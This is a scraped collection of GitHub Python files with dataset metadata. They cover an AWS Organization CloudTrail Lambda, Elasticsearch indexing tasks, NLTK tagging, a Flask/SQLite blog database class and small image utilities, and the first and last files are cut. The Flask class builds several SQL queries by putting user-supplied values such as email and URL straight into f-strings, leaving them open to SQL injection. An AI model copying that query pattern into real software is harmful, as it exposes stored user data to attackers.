np.array(test_acc_list)\n np.save(\"origin_test_acc_list\", test_acc_list)\n \n\n", "repo_name": "alstjrdld1/gray_anomaly_detection", "sub_path": "code/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 4803, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.load", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 61, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 92, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 104, "usage_type": "call"}]} +{"seq_id": "8127325188", "text": "from __future__ import print_function\nimport logging\nimport os\nimport re\nimport boto3\nfrom botocore.exceptions import ClientError\nfrom crhelper import CfnResource\n\n# Setup Default Logger\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\"\"\"\nThe purpose of this script is to create and configure an Organization CloudTrail.\n\"\"\"\n\n# Initialise the helper, all inputs are optional, this example shows the defaults\nhelper = CfnResource(json_logging=False, log_level=\"DEBUG\", boto_level=\"CRITICAL\")\n\nAWS_SERVICE_PRINCIPAL = \"cloudtrail.amazonaws.com\"\n\ntry:\n # Process Environment Variables\n if \"LOG_LEVEL\" in os.environ:\n LOG_LEVEL = os.environ.get(\"LOG_LEVEL\")\n if isinstance(LOG_LEVEL, str):\n log_level = logging.getLevelName(LOG_LEVEL.upper())\n logger.setLevel(log_level)\n else:\n raise ValueError(\"LOG_LEVEL parameter is not a string\")\n\n # Required variables\n cloudtrail_regex = \"^[A-Za-z0-9][a-zA-Z0-9-\\\\-_.]{2,127}$\"\n CLOUDTRAIL_NAME = os.environ.get(\"CLOUDTRAIL_NAME\", \"\")\n if not CLOUDTRAIL_NAME or not re.match(cloudtrail_regex, CLOUDTRAIL_NAME):\n raise ValueError(\"Missing or Invalid CloudTrail Name\")\n\n S3_BUCKET_NAME = os.environ.get(\"S3_BUCKET_NAME\", \"\")\n bucket_regex = \"^[a-zA-Z0-9-\\\\-_.]{2,62}$\"\n if not S3_BUCKET_NAME or not re.match(bucket_regex, S3_BUCKET_NAME):\n raise ValueError(\"Missing or Invalid S3 Bucket Name\")\n\n KMS_KEY_ID = os.environ.get(\"KMS_KEY_ID\", \"\")\n if not KMS_KEY_ID:\n raise ValueError(\"Missing KMS Key ID ARN\")\n\n ENABLE_S3_DATA_EVENTS = (os.environ.get(\"ENABLE_S3_DATA_EVENTS\", \"false\")).lower() in \"true\"\n ENABLE_LAMBDA_DATA_EVENTS = (os.environ.get(\"ENABLE_LAMBDA_DATA_EVENTS\", \"false\")).lower() in \"true\"\n ENABLE_DATA_EVENTS_ONLY = (os.environ.get(\"ENABLE_DATA_EVENTS_ONLY\", \"false\")).lower() in \"true\"\n\n # Optional Variables\n S3_KEY_PREFIX = os.environ.get(\"S3_KEY_PREFIX\", \"\")\n CLOUDWATCH_LOG_GROUP_ARN = os.environ.get(\"CLOUDWATCH_LOG_GROUP_ARN\", \"\")\n CLOUDWATCH_LOG_GROUP_ROLE_ARN = os.environ.get(\"CLOUDWATCH_LOG_GROUP_ROLE_ARN\", \"\")\n TAG_KEY1 = os.environ.get(\"TAG_KEY1\", \"\")\n TAG_VALUE1 = os.environ.get(\"TAG_VALUE1\", \"\")\n\n cloudtrail = boto3.client(\"cloudtrail\")\nexcept Exception as e:\n helper.init_failure(e)\n\n\ndef get_data_event_config() -> dict:\n \"\"\"\n Creates the CloudTrail event selectors configuration\n :return: event_selectors\n \"\"\"\n\n if ENABLE_DATA_EVENTS_ONLY:\n event_selectors = {\n \"ReadWriteType\": \"All\",\n \"IncludeManagementEvents\": False,\n \"DataResources\": [],\n }\n else:\n event_selectors = {\n \"ReadWriteType\": \"All\",\n \"IncludeManagementEvents\": True,\n \"DataResources\": [],\n }\n\n s3_data_resource = {\"Type\": \"AWS::S3::Object\", \"Values\": [\"arn:aws:s3:::\"]}\n\n lambda_data_resource = {\n \"Type\": \"AWS::Lambda::Function\",\n \"Values\": [\"arn:aws:lambda\"],\n }\n\n if ENABLE_S3_DATA_EVENTS:\n event_selectors[\"DataResources\"].append(s3_data_resource)\n logger.info(\"S3 Data Events Added to Event Selectors\")\n\n if ENABLE_LAMBDA_DATA_EVENTS:\n event_selectors[\"DataResources\"].append(lambda_data_resource)\n logger.info(\"Lambda Data Events Added to Event Selectors\")\n\n return event_selectors\n\n\ndef enable_aws_service_access(service_principal: str):\n \"\"\"\n Enables the AWS Service Access for the provided service principal\n :param service_principal: AWS Service Principal format: service_name.amazonaws.com\n :return: None\n \"\"\"\n logger.info(\"Enable AWS Service Access for: \" + str(service_principal))\n\n try:\n organizations = boto3.client(\"organizations\")\n organizations.enable_aws_service_access(ServicePrincipal=service_principal)\n except ClientError as ce:\n logger.error(f\"Client Error: {str(ce)}\")\n raise\n except Exception as exc:\n logger.error(f\"Exception: {str(exc)}\")\n raise\n\n\ndef get_cloudtrail_parameters(is_create) -> dict:\n \"\"\"\n Dynamically creates a parameter dict for the CloudTrail create_trail and update_trail API calls.\n :param is_create: True = create, False = update\n :return: cloudtrail_params dict\n \"\"\"\n cloudtrail_params = {\n \"Name\": CLOUDTRAIL_NAME,\n \"S3BucketName\": S3_BUCKET_NAME,\n \"IncludeGlobalServiceEvents\": True,\n \"IsMultiRegionTrail\": True,\n \"EnableLogFileValidation\": True,\n \"KmsKeyId\": KMS_KEY_ID,\n \"IsOrganizationTrail\": True,\n }\n\n if is_create and TAG_KEY1 and TAG_VALUE1:\n cloudtrail_params[\"TagsList\"] = [{\"Key\": TAG_KEY1, \"Value\": TAG_VALUE1}]\n\n if S3_KEY_PREFIX:\n cloudtrail_params[\"S3KeyPrefix\"] = S3_KEY_PREFIX\n\n if CLOUDWATCH_LOG_GROUP_ARN and CLOUDWATCH_LOG_GROUP_ROLE_ARN:\n cloudtrail_params[\"CloudWatchLogsLogGroupArn\"] = CLOUDWATCH_LOG_GROUP_ARN\n cloudtrail_params[\"CloudWatchLogsRoleArn\"] = CLOUDWATCH_LOG_GROUP_ROLE_ARN\n\n return cloudtrail_params\n\n\n@helper.create\ndef create(event, context) -> str:\n \"\"\"\n CloudFormation Create Event. Creates a CloudTrail with the provided parameters\n :param event: event data\n :param context: runtime information\n :return: OrganizationTrailResourceId\n \"\"\"\n logger.info(\"Create Event\")\n try:\n enable_aws_service_access(AWS_SERVICE_PRINCIPAL)\n\n cloudtrail.create_trail(**get_cloudtrail_parameters(True))\n logger.info(\"Created an Organization CloudTrail\")\n\n event_selectors = get_data_event_config()\n\n if event_selectors and event_selectors[\"DataResources\"]:\n\n cloudtrail.put_event_selectors(\n TrailName=CLOUDTRAIL_NAME, EventSelectors=[event_selectors]\n )\n\n logger.info(\"Data Events Enabled\")\n\n cloudtrail.start_logging(Name=CLOUDTRAIL_NAME)\n except ClientError as ce:\n logger.error(f\"Unexpected error: {str(ce)}\")\n raise ValueError(f\"CloudTrail API Exception: {str(ce)}\")\n except Exception as exc:\n logger.error(f\"Unexpected error: {str(exc)}\")\n raise ValueError(f\"Exception: {str(exc)}\")\n\n return \"OrganizationTrailResourceId\"\n\n\n@helper.update\ndef update(event, context):\n \"\"\"\n CloudFormation Update Event. Updates CloudTrail with the provided parameters.\n :param event: event data\n :param context: runtime information\n :return: CloudFormation response\n \"\"\"\n logger.info(\"Update Event\")\n\n try:\n cloudtrail.update_trail(**get_cloudtrail_parameters(False))\n logger.info(\"Updated Organization CloudTrail\")\n\n event_selectors = get_data_event_config()\n\n if event_selectors and event_selectors[\"DataResources\"]:\n cloudtrail.put_event_selectors(\n TrailName=CLOUDTRAIL_NAME, EventSelectors=[event_selectors]\n )\n\n logger.info(\"Data Events Updated\")\n except ClientError as ce:\n if ce.response[\"Error\"][\"Code\"] == \"TrailNotFoundException\":\n logger.error(\"Trail Does Not Exist\")\n raise ValueError(f\"TrailNotFoundException: {str(ce)}\")\n else:\n logger.error(f\"Unexpected error: {str(ce)}\")\n raise ValueError(f\"CloudTrail API Exception: {str(ce)}\")\n except Exception as exc:\n logger.error(f\"Unexpected error: {str(exc)}\")\n raise ValueError(f\"Exception: {str(exc)}\")\n\n\n@helper.delete\ndef delete(event, context):\n \"\"\"\n CloudFormation Delete Event. Deletes the provided CloudTrail\n :param event: event data\n :param context: runtime information\n :return: CloudFormation response\n \"\"\"\n logger.info(\"Delete Event\")\n try:\n cloudtrail.delete_trail(Name=CLOUDTRAIL_NAME)\n except ClientError as ce:\n if ce.response[\"Error\"][\"Code\"] == \"TrailNotFoundException\":\n logger.error(f\"Trail Does Not Exist {str(ce)}\")\n raise ValueError(f\"TrailNotFoundException: {str(ce)}\")\n else:\n logger.error(f\"Unexpected error: {str(ce)}\")\n raise ValueError(f\"CloudTrail API Exception: {str(ce)}\")\n except Exception as exc:\n logger.error(f\"Unexpected error: {str(exc)}\")\n raise ValueError(f\"Exception: {str(exc)}\")\n\n logger.info(\"Deleted the Organizations CloudTrail\")\n\n\ndef lambda_handler(event, context):\n \"\"\"\n Lambda Handler\n :param event: event data\n :param context: runtime information\n :return: CloudFormation response\n \"\"\"\n logger.info(\"....Lambda Handler Started....\")\n helper(event, context)\n", "repo_name": "mynameisakash/aws_sec_ref_arch", "sub_path": "solutions/cloudtrail/cloudtrail-org/code/src/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 8541, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 11, "usage_type": "attribute"}, {"api_name": "crhelper.CfnResource", "line_number": 18, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "logging.getLevelName", "line_number": 27, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 34, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 35, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 38, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 38, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 43, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 47, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 48, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 49, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 52, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 53, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 54, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 55, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 56, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 56, "usage_type": "attribute"}, {"api_name": "boto3.client", "line_number": 58, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 109, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 111, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 174, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 206, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 229, "usage_type": "name"}]} +{"seq_id": "9810019721", "text": "import logging\n\nfrom django.utils import timezone\nfrom elasticsearch import NotFoundError\n\nfrom signals.apps.search.documents.signal import SignalDocument\nfrom signals.apps.signals.models import Signal\nfrom signals.celery import app\n\nlog = logging.getLogger(__name__)\n\n\n@app.task\ndef save_to_elastic(signal_id):\n if not SignalDocument.ping():\n raise Exception('Elastic cluster is unreachable')\n\n signal = Signal.objects.get(id=signal_id)\n signal_document = SignalDocument.create_document(signal)\n signal_document.save()\n\n\n@app.task\ndef rebuild_index():\n log.info('rebuild_index - start')\n\n if not SignalDocument.ping():\n raise Exception('Elastic cluster is unreachable')\n\n SignalDocument.index_documents()\n log.info('rebuild_index - done!')\n\n\n@app.task\ndef delete_from_elastic(signal):\n if not SignalDocument.ping():\n raise Exception('Elastic cluster is unreachable')\n\n if isinstance(signal, int):\n signal = Signal.objects.get(id=signal)\n\n signal_document = SignalDocument.create_document(signal)\n\n try:\n signal_document.delete()\n except NotFoundError:\n log.warning(f'Signal {signal.id} not found in Elasticsearch')\n\n\n@app.task\ndef index_signals_updated_in_date_range(from_date=None, to_date=None):\n \"\"\"\n Index all Signals updated in the given date range (Copied from the elastic_index management command)\n\n The from_date and to_date are optional. By default, this task will update all signals changed in the last 2 days.\n \"\"\"\n if not SignalDocument.ping():\n raise Exception('Elastic cluster is unreachable')\n\n if from_date:\n from_date = timezone.make_aware(timezone.datetime.strptime(from_date, '%Y-%m-%d'))\n else:\n # Default is 2 days ago\n from_date = timezone.now() - timezone.timedelta(days=2)\n\n from_date = from_date.replace(hour=00, minute=00, second=00) # Beginning of the day given in from_date\n\n if to_date:\n to_date = timezone.make_aware(timezone.datetime.strptime(to_date, '%Y-%m-%d'))\n else:\n # Default is today\n to_date = timezone.now()\n\n to_date = to_date + timezone.timedelta(days=1)\n to_date = to_date.replace(hour=00, minute=00, second=00) # Beginning of the day after the to_date\n\n log.info(f'index_signals_updated_in_date_range - from {from_date}, to {to_date}')\n\n if to_date < from_date:\n log.warning('To date cannot be before the from date')\n return\n\n signal_qs = Signal.objects.filter(updated_at__range=[from_date, to_date]).order_by('-updated_at')\n SignalDocument.index_documents(queryset=signal_qs)\n\n log.info('index_signals_updated_in_date_range - done!')\n", "repo_name": "Amsterdam/signals", "sub_path": "app/signals/apps/search/tasks.py", "file_name": "tasks.py", "file_ext": "py", "file_size_in_byte": 2678, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.ping", "line_number": 15, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 15, "usage_type": "name"}, {"api_name": "signals.apps.signals.models.Signal.objects.get", "line_number": 18, "usage_type": "call"}, {"api_name": "signals.apps.signals.models.Signal.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "signals.apps.signals.models.Signal", "line_number": 18, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.create_document", "line_number": 19, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 19, "usage_type": "name"}, {"api_name": "signals.celery.app.task", "line_number": 13, "usage_type": "attribute"}, {"api_name": "signals.celery.app", "line_number": 13, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.ping", "line_number": 27, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 27, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.index_documents", "line_number": 30, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 30, "usage_type": "name"}, {"api_name": "signals.celery.app.task", "line_number": 23, "usage_type": "attribute"}, {"api_name": "signals.celery.app", "line_number": 23, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.ping", "line_number": 36, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 36, "usage_type": "name"}, {"api_name": "signals.apps.signals.models.Signal.objects.get", "line_number": 40, "usage_type": "call"}, {"api_name": "signals.apps.signals.models.Signal.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "signals.apps.signals.models.Signal", "line_number": 40, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.create_document", "line_number": 42, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 42, "usage_type": "name"}, {"api_name": "elasticsearch.NotFoundError", "line_number": 46, "usage_type": "name"}, {"api_name": "signals.celery.app.task", "line_number": 34, "usage_type": "attribute"}, {"api_name": "signals.celery.app", "line_number": 34, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.ping", "line_number": 57, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 57, "usage_type": "name"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 61, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 61, "usage_type": "name"}, {"api_name": "django.utils.timezone.datetime.strptime", "line_number": 61, "usage_type": "call"}, {"api_name": "django.utils.timezone.datetime", "line_number": 61, "usage_type": "attribute"}, {"api_name": "django.utils.timezone.now", "line_number": 64, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 64, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 64, "usage_type": "call"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 69, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 69, "usage_type": "name"}, {"api_name": "django.utils.timezone.datetime.strptime", "line_number": 69, "usage_type": "call"}, {"api_name": "django.utils.timezone.datetime", "line_number": 69, "usage_type": "attribute"}, {"api_name": "django.utils.timezone.now", "line_number": 72, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 72, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 74, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 74, "usage_type": "name"}, {"api_name": "signals.apps.signals.models.Signal.objects.filter", "line_number": 83, "usage_type": "call"}, {"api_name": "signals.apps.signals.models.Signal.objects", "line_number": 83, "usage_type": "attribute"}, {"api_name": "signals.apps.signals.models.Signal", "line_number": 83, "usage_type": "name"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument.index_documents", "line_number": 84, "usage_type": "call"}, {"api_name": "signals.apps.search.documents.signal.SignalDocument", "line_number": 84, "usage_type": "name"}, {"api_name": "signals.celery.app.task", "line_number": 50, "usage_type": "attribute"}, {"api_name": "signals.celery.app", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "31044616100", "text": "import nltk\n#nltk.download()\n#nltk.download('punkt')\n#nltk.download('mac_morpho')\n\ntagged_sents = nltk.corpus.mac_morpho.tagged_sents()\nt0 = nltk.DefaultTagger('N')\nt1 = nltk.UnigramTagger(tagged_sents, backoff=t0)\n#t2 = nltk.BigramTagger(tagged_sents, backoff=t1)\n#t3 = nltk.TrigramTagger(tagged_sents, backoff=t2)\n\n\n\n#t3_alt = nltk.TrigramTagger(tagged_sents)\n\"\"\"\nfrom pickle import dump\noutput = open('mac_morpho.pkl', 'wb')\ndump(t3, output, -1)\noutput.close()\n\nfrom pickle import load\ninput = open('mac_morpho.pkl', 'rb')\ntagger = load(input)\ninput.close()\n\"\"\"\n\n\nl='Ontem, o João Antunes comeu peixe ao almoço'\nprint(l)\n#separa o texto em pedaços.\nl1=nltk.word_tokenize('Ontem, o João Antunes comeu peixe ao almoço')\nprint(l1)\ntagged = t1.tag(nltk.word_tokenize('Ontem, o João Antunes comeu peixe ao almoço'))\nprint(tagged)\n\n\n\n\n\n\"\"\"\ngramatica = r\n#NE: {+}\n#PP: {}\n\n\nanaliseGramatical = nltk.RegexpParser(gramatica)\nanaliseGramatical.parse(tagged)\n\ntree = analiseGramatical.parse(tagged)\ntree.draw()\nprint(\"ola\")\n\"\"\"\n", "repo_name": "PJM97/IPLN", "sub_path": "TP2/cenas/andre.py", "file_name": "andre.py", "file_ext": "py", "file_size_in_byte": 1043, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "nltk.corpus.mac_morpho.tagged_sents", "line_number": 6, "usage_type": "call"}, {"api_name": "nltk.corpus", "line_number": 6, "usage_type": "attribute"}, {"api_name": "nltk.DefaultTagger", "line_number": 7, "usage_type": "call"}, {"api_name": "nltk.UnigramTagger", "line_number": 8, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 31, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "18598004841", "text": "import sqlite3\nimport time\nimport math\n\nfrom flask import url_for\n\n\nclass FDataBase:\n # Constructor\n def __init__(self, db):\n self.__db = db\n self.__cur = db.cursor()\n\n\n # Method returns list of values from table \"mainmenu\"\n def getMenu(self):\n sql = '''SELECT * FROM mainmenu'''\n try:\n self.__cur.execute(sql)\n res = self.__cur.fetchall()\n if res: return res\n except:\n print('Ошибка чтения из БД')\n return [] # If error, it returns empty list\n \n\n # Method add post to table\n def addPost(self, title, text, url):\n try:\n # Check that 'url' already doesn't exist\n self.__cur.execute(f'SELECT COUNT() as \"count\" FROM posts WHERE url LIKE \"{url}\"')\n res = self.__cur.fetchone()\n if res['count'] > 0:\n print('Статья с таким url уже существует')\n return False\n\n # time execute\n tm = math.floor(time.time())\n\n # insert values to table\n self.__cur.execute('INSERT INTO posts VALUES(NULL, ?, ?, ?, ?)', (title, text, url, tm))\n self.__db.commit()\n except sqlite3.Error as e:\n print('Ошибка добавления статьи в БД'+str(e))\n return False\n \n return True\n\n\n # Get post from table \"posts\"\n def getPost(self, alias):\n try:\n self.__cur.execute(f'SELECT title, text FROM posts WHERE url LIKE \"{alias}\" LIMIT 1')\n res = self.__cur.fetchone() # Mehod takes one value\n if res:\n \n # Regular expressions to invite full links to image\n # !!!Better save correcting link to data base for saving resourses\n # base = url_for('static', filename='img')\n # url to image\n # text = re.sub(r'(?P]*src=)(?P[\\\"'])(?P.+?)(?P=quote)>',\n # '\\\\g' + base + \"/\\\\g>\",\n # res['text'])\n # return (res['tittle', text])\n\n return res\n except sqlite3.Error as e:\n print(\"Ошибка получения статьи из БД\"+str(e))\n \n return (False, False)\n \n\n # Getting post annonce\n def getPostsAnonce(self):\n try:\n self.__cur.execute(f'SELECT id, title, text, url FROM posts ORDER BY time DESC')\n res = self.__cur.fetchall()\n if res: return res\n except sqlite3.Error as e:\n print('Ошибка получения статьи из БД'+str(e))\n \n return []\n\n\n # Add user register information\n def addUser(self, name, email, hpsw):\n try:\n self.__cur.execute(f'SELECT COUNT() as \"count\" FROM users WHERE email LIKE \"{email}\" ')\n res = self.__cur.fetchone()\n if res['count'] > 0:\n print('Пользователь с таким email уже существует')\n return False\n \n tm = math.floor(time.time())\n self.__cur.execute('INSERT INTO users VALUES (NULL, ?, ?, ?, NULL, ?)', (name, email, hpsw, tm))\n self.__db.commit()\n except sqlite3.Error as e:\n print('Ошибка добавления пользователя в БД'+str(e))\n \n return True\n \n\n # Getting user's information at id\n def getUser(self, user_id):\n try:\n self.__cur.execute(f'SELECT * FROM users WHERE id = {user_id} LIMIT 1')\n res = self.__cur.fetchone()\n if not res:\n print('Пользователь не найден')\n return False\n \n return res\n except sqlite3.Error as e:\n print('Ошибка получения данных из БД'+str(e))\n \n return False\n \n\n # identification user by email (function 'login')\n def getUserByEmail(self, email):\n try:\n self.__cur.execute(f'SELECT * FROM users WHERE email = \"{email}\" LIMIT 1')\n res = self.__cur.fetchone()\n if not res:\n print('Пользователь не найден')\n return False\n \n return res\n except sqlite3.Error as e:\n print('Ошибка получения данных из БД'+str(e))\n \n return False\n \n\n def updateUserAvatar(self, avatar, user_id):\n if not avatar:\n return False\n \n try:\n # Transfom file to binary object (method 'Binary')\n binary = sqlite3.Binary(avatar)\n self.__cur.execute(f'UPDATE users SET avatar = ? WHERE id = ?', (binary, user_id))\n self.__db.commit()\n except sqlite3.Error as e:\n print('Ошибка обновления аватара в БД'+str(e))\n return False\n return True\n", "repo_name": "Denis-Bez/Education_Python_01", "sub_path": "05_Education_Flask/FDataBase.py", "file_name": "FDataBase.py", "file_ext": "py", "file_size_in_byte": 5076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.floor", "line_number": 38, "usage_type": "call"}, {"api_name": "time.time", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 67, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 79, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 94, "usage_type": "call"}, {"api_name": "time.time", "line_number": 94, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 97, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 113, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 129, "usage_type": "attribute"}, {"api_name": "sqlite3.Binary", "line_number": 141, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 144, "usage_type": "attribute"}]} +{"seq_id": "32818862175", "text": "#*** coding: utf-8 ***#\nimport os, sys, pdb\nimport numpy as np\nimport cv2\n\nfile_name, save_file = sys.argv[1:]\n\nmask_rois = 'roi_mask/'\nimg_shape = {}\nfor mask_file in os.listdir(mask_rois):\n roi_data = cv2.imread(os.path.join(mask_rois, mask_file))\n h, w, _ = roi_data.shape\n img_shape[mask_file.split('_')[-1].split('.')[0]] = [h, w] \n\n# file_name = 'track1_allocate_ids_89_2666.txt'\n\nlines = open(file_name).readlines()\n\n# save_file = 'track1_allocate_ids_89_2666_expand_1.2.txt'\nf_w = open(save_file, 'w')\n\nfor line in lines:\n line_list = line.split()\n cam_id = int(float(line_list[0]))\n obj_id = int(float(line_list[1]))\n frame_id = int(float(line_list[2]))\n x1 = int(float(line_list[3]))\n y1 = int(float(line_list[4]))\n w = int(float(line_list[5]))\n h = int(float(line_list[6]))\n x2 = x1 + w\n y2 = y1 + h\n\n #import pdb; pdb.set_trace()\n [height, width] = img_shape['c0' + str(cam_id)]\n \n cx = 0.5*x1 + 0.5*x2\n cy = 0.5*y1 + 0.5*y2\n\n if w < 120:\n w = 1.2 * w\n else:\n w = 20 + w\n\n if h < 120:\n h = 1.2 *h\n else:\n h = 20 + h\n #w = min(w*1.2, w+40)\n #h = min(h*1.2, h+40)\n #w = min(w*1.3, w+40)\n #h = min(h*1.3, h+40)\n #w = min(w*1.4, w+45)\n #h = min(h*1.4, h+45)\n x1, y1 = max(0, cx - 0.5*w), max(0, cy - 0.5*h)\n x2, y2 = min(width, cx + 0.5*w), min(height, cy + 0.5*h)\n w , h = x2-x1 , y2-y1\n\n f_w.write(str(cam_id) + ' ' + str(obj_id) + ' ' + str(frame_id) + ' ' + str(int(x1)) + ' ' + str(int(y1)) + ' ' + str(int(w)) + ' ' + str(int(h)) + ' -1 -1' '\\n')\nf_w.close()\n", "repo_name": "Yejin0111/AICITY2022-Track1-MTMC", "sub_path": "ICA/postprocess/expand_pred_boxes.py", "file_name": "expand_pred_boxes.py", "file_ext": "py", "file_size_in_byte": 1631, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 33, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}]} +{"seq_id": "19858286067", "text": "import os, glob\nfrom PIL import Image\n\ndef checkImages(dir):\n print(\"Checking for black/white images\")\n os.chdir(dir)\n for file in glob.glob(\"*.tif\"):\n im = Image.open(file)\n extrema = im.convert(\"L\").getextrema()\n if (extrema == (0, 0)) or (extrema == (1, 1)): #image is all black or all white\n os.remove(file)\n print(file + \" was deleted as it was all black or white\")\n return 0\n", "repo_name": "maritime-web/Satellite-Consumer", "sub_path": "CheckImages.py", "file_name": "CheckImages.py", "file_ext": "py", "file_size_in_byte": 436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.chdir", "line_number": 6, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 8, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "28847510176", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n#Assignment 1 combines Python programming, CIM-XML modelling and parsing and\r\nfinally model building using Pandapower and using these create an embryo of Energy Management\r\nSystem.\r\n\r\n@author: Amritha Jayan and Sarika Vaiyapuri Gunassekaran\r\n\r\n\"\"\"\r\nimport xml.etree.ElementTree as ET\r\n\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport tkinter\r\nfrom tkinter import filedialog\r\n\r\n# GUI of the application\r\nroot = Tk()\r\nroot.title(\"EH2745 - Assignment 1\")\r\ncontent = ttk.Frame(root)\r\nframe = ttk.Frame(content, borderwidth=5, relief=\"solid\", width=600, height=300)\r\nimg = PhotoImage(file='KTH.png')\r\npanel = ttk.Label(content, 